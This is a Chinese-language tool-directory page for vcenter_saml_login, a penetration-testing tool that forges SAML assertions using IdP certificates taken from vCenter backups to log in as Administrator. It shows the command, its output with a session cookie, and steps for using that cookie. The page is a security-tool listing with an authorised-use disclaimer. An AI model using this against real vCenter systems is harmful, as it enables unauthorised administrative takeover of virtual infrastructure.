Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
vcenter_saml_login — 一种从 vCenter 备份中提取 IdP 证书并以管理员身份登录的工具 | Kitploit
工具/GitHubGitHub/horizon3ai/vcenter_saml_login
身份验证与授权云基础设施安全权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubhorizon3ai/vcenter_saml_login

vcenter_saml_login

一种从 vCenter 备份中提取 IdP 证书并以管理员身份登录的工具

查看仓库
529952年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

vCenter SAML 登录工具

一款用于从 vCenter 备份中提取身份提供程序(IdP)证书并以 Administrator 身份登录的工具

背景

通常在渗透测试任务中,我们会通过近期披露的 CVE 获得文件服务器上 vCenter 备份的访问权限,或获得 VCSA 主机的 root 权限。登录 vCenter vSphere UI 可以让我们轻松访问更多系统、获取机密信息,并向客户展示这些发现的影响。

data.mdb 文件包含这些证书,可在 vCenter 备份中找到,也可在具有 root 权限的 VCSA 主机上找到。这些证书以明文存储,可用于为任何用户(包括内置的 Administrator)签署任何 SAML 身份验证请求。

如果您想了解此工具的更多用例以及我们如何利用它获得 vCenter 主机的管理员访问权限,请查看我们的博客文章:https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

用法

root@kitploit:~
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

使用上述 Cookie,访问位于 https://<VCSA>/ui 的 VCSA 实例,在 /ui 路径下添加该 Cookie,然后重新浏览至 https://<VCSA>/ui。

演示

免责声明

本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除明确授权的情况外,不应用于攻击系统。项目维护者不对软件的滥用负责或承担任何责任。请负责任地使用。

下载工具